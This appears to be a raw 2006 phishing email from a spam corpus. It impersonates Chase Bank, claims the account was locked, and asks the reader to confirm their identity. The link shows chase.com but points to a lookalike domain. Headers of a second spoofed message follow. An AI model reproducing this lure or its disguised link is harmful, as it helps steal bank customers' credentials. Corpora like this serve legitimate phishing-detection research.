From: "CHASE BANK" <Support@Chase.com>
Reply-To: "CHASE BANK" <Support@Chase.com>
To: dros@example.com
Subject: IMPORTANT : Account Verification
Date: Mon, 10 Apr 2006 14:13:42 -0500
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--5903510440687325"
X-Priority: 3
X-MSMail-Priority: Normal
Status: O
X-Status: 
X-Keywords:                  
X-UID: 760

----5903510440687325
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html><head><style type=3D"text/css">
<!--
blockquote, dl, ul, ol, li { padding-top: 0 ; padding-bottom: 0 }
style30 {
	font-size: 14px;
	font-family: Verdana;
}
style34 {
	font-size: 14px;
	color: #00395D;
	font-weight: bold;
}
style35 {
	font-size: 12px;
	font-weight: bold;
}
style37 {font-size: 12px; font-family: Verdana; }
style38 {font-size: 12px}
-->
</style><title>CHASE ONLINE</title><meta http-equiv=3D"Content-Type" conte=
nt=3D"text/html; charset=3Diso-8859-1"></head><body>
<blockquote type=3D"cite" cite>   <img src=3D"https://chaseonline.chase.co=
m/echaseweb/common/images/secure_msg_ctr_header.gif" alt=3D"2" width=3D"23=
9" height=3D"24">
  <table width=3D"728" border=3D"0">
    <tr bordercolor=3D"#0000CC" bgcolor=3D"#5280B1">
      <th height=3D"27" align=3D"left" bgcolor=3D"#5280B1" scope=3D"col"><=
img src=3D"https://chaseonline.chase.com/echaseweb/common/images/chase_onl=
ine.gif" alt=3D"1" width=3D"200" height=3D"25"></th>
    </tr>
  </table>
     <p class=3D"style34"> Message:</p>
     <p align=3D"left" class=3D"style37">Dear CHASE Customer,</p>
     <p align=3D"left"><span class=3D"style37">We regret to inform you, th=
at we had   to lock your Chase Access because we have reasons to believe  =
 that your account may have been compromised by outside parties. In order =
  to protect your sensitive information, we temporaly suspended?your accou=
nt.</span><span class=3D"style30"> <br>
  </span></p>
     <p align=3D"left" class=3D"style30"><span class=3D"style37">To reacti=
vate your account, click on the link below   and confirm your identity by =
completing the secure form what will appear.</span><br>
        </p>
     <p align=3D"left"><a
href=3D"http://www.chase.com.l1i00.com"><font
face=3D"Verdana">http://www.chase.com/account.html</font></a><br>
   </p>
     <p align=3D"left" class=3D"style37">We have seen unusual attempts for=
 logging in   regarding your personal account, therefore this confirmation=
 regarding your   account it&#58808; only for security reasons.</p>
     <p align=3D"left" class=3D"style37">Thank you for your time and consi=
deration in this   matter.</p>
     <p align=3D"left" class=3D"style37">Have questions? Our online help s=
creens provide answers to many frequently <BR>
       asked questions. You can also click the Customer Center tab then go=
 to the <BR>
     Contact Us page to find a list of helpful numbers to call. </p>
</blockquote><blockquote cite class=3D"style37" type=3D"cite"><p align=3D"=
left">Please do not reply to this automatically generated e-mail. </p>
</blockquote>

  <blockquote type=3D"cite" cite><p align=3D"left"><span class=3D"style37"=
>We know you have a choice of banks. Thanks for choosing ours.</span><BR>
    <br>
    <span class=3D"style37">Sincerely,<BR>
    Online Banking   Team,</span></p>
</blockquote>
</body>
</html>





----5903510440687325--

From support@chae.com  Mon Apr 10 16:07:44 2006
Return-Path: <support@chae.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.5.6.7])
	by naughty.example.com (Postfix) with ESMTP id 69D1F536EC3
	for <nobody@login.example.com>; Mon, 10 Apr 2006 16:07:44 -0400 (EDT)
Received: from tribal.tribalfusiondelhi.com (unknown [203.122.18.134])
	by mail1.example.com (Postfix) with ESMTP id D10366CCEF0
	for <nobody@example.com>; Mon, 10 Apr 2006 11:21:22 -0400 (EDT)
Received: from secure ([204.8.9.233]) by tribal.tribalfusiondelhi.com with Microsoft SMTPSVC(5.0.2195.6713);
	 Tue, 11 Apr 2006 01:40:15 +0530
